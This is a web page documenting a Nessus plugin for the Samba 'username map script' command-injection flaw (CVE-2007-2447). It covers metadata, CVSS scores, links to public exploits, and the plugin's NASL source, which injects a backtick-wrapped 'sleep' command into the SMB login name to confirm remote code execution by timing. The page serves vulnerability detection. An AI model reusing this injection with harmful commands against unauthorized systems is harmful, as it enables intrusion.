Samba 3.0.0 'SamrChangePassword' RCE - Nessus

Medium   Plugin ID: 82580

This page contains detailed information about the Samba 3.0.0 'SamrChangePassword' RCE Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 82580
Name: Samba 3.0.0 'SamrChangePassword' RCE
Filename: samba_3_login_rce.nasl
Vulnerability Published: 2007-05-14
This Plugin Published: 2015-04-06
Last Modification Time: 2020-03-09
Plugin Version: 1.8
Plugin Type: remote
Plugin Family: Misc.
Dependencies: smb_nativelanman.nasl
Required KB Items [?]: SMB/NativeLanManager
Excluded KB Items: global_settings/supplied_logins_only

Vulnerability Information


Severity: Medium
Vulnerability Published: 2007-05-14
Patch Published: 2007-05-14
CVE [?]: CVE-2007-2447
CPE [?]: cpe:/a:samba:samba

Synopsis

The file and print server running on the remote host is affected by a remote code execution vulnerability.

Description

The version of Samba running on the remote host is affected by a remote code execution vulnerability due to improper validation of user-supplied input when passing RPC messages from external scripts to a shell. A remote, authenticated attacker can exploit this via the use of shell metacharacters during login negotiations when the 'username map script' option is enabled, or during the invocation of other printer and file management MS-RPC calls.

Solution

Upgrade to version 3.0.25 or later

Public Exploits


Target Network Port(s): 139, 445
Target Asset(s): Services/smb
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Core Impact)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Samba 3.0.0 'SamrChangePassword' RCE vulnerability:

  1. Metasploit: exploit/multi/samba/usermap_script
    [Samba "username map script" Command Execution]
  2. Exploit-DB: exploits/unix/remote/16320.rb
    [EDB-16320: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)]
  3. GitHub: https://github.com/0xKn/CVE-2007-2447
    [CVE-2007-2447]
  4. GitHub: https://github.com/0xkasra/CVE-2007-2447
    [CVE-2007-2447]
  5. GitHub: https://github.com/3hydraking/usermap_script_CVE-2007-2447
    [CVE-2007-2447]
  6. GitHub: https://github.com/3t4n/samba-3.0.24-CVE-2007-2447-vunerable-
    [CVE-2007-2447]
  7. GitHub: https://github.com/3x1t1um/CVE-2007-2447
    [CVE-2007-2447]
  8. GitHub: https://github.com/4n0nym0u5dk/usermap_script_CVE-2007-2447
    [CVE-2007-2447]
  9. GitHub: https://github.com/Alien0ne/CVE-2007-2447
    [CVE-2007-2447: CVE-2007-2447 - Samba usermap script]
  10. GitHub: https://github.com/GaloisInc/msf-haskell
    [CVE-2007-2447]
  11. GitHub: https://github.com/JoseBarrios/CVE-2007-2447
    [CVE-2007-2447: Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to ...]
  12. GitHub: https://github.com/SamHackingArticles/CVE-2007-2447
    [CVE-2007-2447]
  13. GitHub: https://github.com/Un4gi/CVE-2007-2447
    [CVE-2007-2447: Samba 3.0.20 username map script exploit]
  14. GitHub: https://github.com/Unam3dd/exploit_smb_usermap_script
    [CVE-2007-2447: Python Script Exploit SMB Usermap Script CVE-2007-2447]
  15. GitHub: https://github.com/Unix13/metasploitable2
    [CVE-2007-2447: PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, ...]
  16. GitHub: https://github.com/WildfootW/CVE-2007-2447_Samba_3.0.25rc3
    [CVE-2007-2447]
  17. GitHub: https://github.com/Ziemni/CVE-2007-2447-in-Python
    [CVE-2007-2447: Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < ...]
  18. GitHub: https://github.com/cherrera0001/CVE-2007-2447
    [CVE-2007-2447: Samba usermap script.]
  19. GitHub: https://github.com/gwyomarch/Lame-HTB-Writeup-FR
    [CVE-2007-2447]
  20. GitHub: https://github.com/k4u5h41/usermap_script_CVE-2007-2447
    [CVE-2007-2447]
  21. GitHub: https://github.com/macosta-42/Exploit-Development
    [CVE-2007-2447]
  22. GitHub: https://github.com/marcocastro100/Intrusion_Detection_System-Python
    [CVE-2007-2447]
  23. GitHub: https://github.com/persian64/CVE-2007-2447
    [CVE-2007-2447]
  24. GitHub: https://github.com/pwnd-root/exploits-and-stuff
    [CVE-2007-2447]
  25. GitHub: https://github.com/voukatas/PenTest_Metasploitable2
    [CVE-2007-2447]
  26. GitHub: https://github.com/xbufu/CVE-2007-2447
    [CVE-2007-2447: Exploit code for CVE-2007-2447 written in Python3.]
  27. GitHub: https://github.com/xlcc4096/exploit-CVE-2007-2447
    [CVE-2007-2447: Exploit for the vulnerability CVE-2007-2447]
  28. GitHub: https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
    [CVE-2007-2447]
  29. GitHub: https://github.com/amriunix/CVE-2007-2447
    [CVE-2007-2447: CVE-2007-2447 - Samba usermap script]
  30. GitHub: https://github.com/b1fair/smb_usermap
    [CVE-2007-2447: A simple exploit for CVE-2007-2447]
  31. GitHub: https://github.com/nickvourd/smb-usermap-destroyer
    [CVE-2007-2447: Smb Usermap Destoyer is a python2 exploit for CVE-2007-2447 ( 'Username' map script' ...]
  32. GitHub: https://github.com/ozuma/CVE-2007-2447
    [CVE-2007-2447: Exploit Samba]
  33. GitHub: https://github.com/Ki11i0n4ir3/Sambaster
    [CVE-2007-2447: Cve-2007-2447 this script was rewrite the part of Metasploit modules to python3]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2007-2447
CVSS V2 Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score:6.0 (Medium)
Impact Subscore:6.4
Exploitability Subscore:6.8
CVSS Temporal Score:5.0 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.0 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:F/RL:O/RC:C
CVSS Base Score:6.3 (Medium)
Impact Subscore:3.4
Exploitability Subscore:2.8
CVSS Temporal Score:5.9 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.9 (Medium)

Go back to menu.

Plugin Source


This is the samba_3_login_rce.nasl nessus plugin source code. This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.

#
# (C) Tenable Network Security, Inc.
#
# @NOAGENT@
#

include("compat.inc");

if (description)
{
  script_id(82580);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/09");

  script_cve_id("CVE-2007-2447");
  script_bugtraq_id(23972);
  script_xref(name:"CERT", value:"268336");

  script_name(english:"Samba 3.0.0 'SamrChangePassword' RCE");
  script_summary(english:"Attempts to exploit the issue.");

  script_set_attribute(attribute:"synopsis", value:
"The file and print server running on the remote host is affected by a
remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Samba running on the remote host is affected by a
remote code execution vulnerability due to improper validation of
user-supplied input when passing RPC messages from external scripts to
a shell. A remote, authenticated attacker can exploit this via the use
of shell metacharacters during login negotiations when the 'username
map script' option is enabled, or during the invocation of other
printer and file management MS-RPC calls.");
  script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/security/CVE-2007-2447.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 3.0.25 or later");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2007-2447");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Samba "username map script" Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/05/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/05/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/04/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:samba:samba");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_nativelanman.nasl");
  script_require_keys("SMB/NativeLanManager");
  script_exclude_keys("global_settings/supplied_logins_only");
  script_require_ports("Services/smb", 139, 445);

  exit(0);
}

include("smb_func.inc");
include("global_settings.inc");
include("misc_func.inc");
include("audit.inc");

lanman = get_kb_item_or_exit("SMB/NativeLanManager");
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

port     = kb_smb_transport();

if("Samba" >!< lanman)
  audit(AUDIT_NOT_DETECT,"Samba",port);

timings  = make_list(3,9,15);
variance = 2;

report = NULL;
foreach timing (timings)
{
  if(!smb_session_init(timeout:timing+variance+1, report_access_trouble:FALSE, report_auth_failure:FALSE))
    audit(AUDIT_FN_FAIL, 'smb_session_init');
  
  cmd   = 'sleep '+timing;
  login = '`' + cmd + '`';
  then  = unixtime();
  retv  = NetUseAdd(login:login, password:rand_str(length:8), share:"IPC$");
  now   = unixtime();
  delta = now-then;
  if(delta < timing || delta > timing+variance)
    audit(AUDIT_LISTEN_NOT_VULN,"Samba",port);
  else
    report += '\n    '+cmd+" (server's response was delayed by "+delta+" seconds)";
  NetUseDel();
}

if(isnull(report))
  audit(AUDIT_LISTEN_NOT_VULN,"Samba",port);

report = '\n  Nessus was able to run the following commands : '+report+'\n';
security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/samba_3_login_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\samba_3_login_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/samba_3_login_rce.nasl

Go back to menu.

How to Run


Here is how to run the Samba 3.0.0 'SamrChangePassword' RCE as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select Misc. plugin family.
  6. On the right side table select Samba 3.0.0 'SamrChangePassword' RCE plugin ID 82580.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl samba_3_login_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a samba_3_login_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - samba_3_login_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state samba_3_login_rce.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: CERT | Computer Emergency Response Team: See also: Similar and related Nessus plugins:
  • 25224 - CentOS 3 / 4 / 5 : samba (CESA-2007:0354)
  • 25228 - Debian DSA-1291-1 : samba - several vulnerabilities
  • 25233 - Fedora Core 5 : samba-3.0.24-5.fc5 (2007-506)
  • 25234 - Fedora Core 6 : samba-3.0.24-5.fc6 (2007-507)
  • 25260 - FreeBSD : samba -- multiple vulnerabilities (3546a833-03ea-11dc-a51d-0019b95d4f14)
  • 25236 - GLSA-200705-15 : Samba: Multiple vulnerabilities
  • 25830 - Mac OS X Multiple Vulnerabilities (Security Update 2007-007)
  • 25237 - Mandrake Linux Security Advisory : samba (MDKSA-2007:104-1)
  • 67499 - Oracle Linux 3 / 4 / 5 : samba (ELSA-2007-0354)
  • 25239 - RHEL 2.1 / 3 / 4 / 5 : samba (RHSA-2007:0354)
  • 25217 - Samba < 3.0.25 Multiple Vulnerabilities
  • 60180 - Scientific Linux Security Update : samba on SL5.x, SL4.x, SL3.x i386/x86_64
  • 25222 - Slackware 10.0 / 10.1 / 10.2 / 11.0 / current : samba (SSA:2007-134-01)
  • 27429 - openSUSE 10 Security Update : samba (samba-3349)
  • 27430 - openSUSE 10 Security Update : samba (samba-3350)
  • 29576 - SuSE 10 Security Update : Samba (ZYPP Patch Number 3351)
  • 27431 - openSUSE 10 Security Update : samba (samba-3827)
  • 27432 - openSUSE 10 Security Update : samba (samba-3828)
  • 29577 - SuSE 10 Security Update : Samba (ZYPP Patch Number 3829)
  • 28059 - Ubuntu 6.06 LTS / 6.10 / 7.04 : samba vulnerabilities (USN-460-1)
  • 40370 - VMSA-2007-0006 : Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player
  • 29965 - Xerox WorkCentre Multiple Samba Vulnerabilities (XRX08-001)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file samba_3_login_rce.nasl version 1.8. For more plugins, visit the Nessus Plugin Library.

Go back to menu.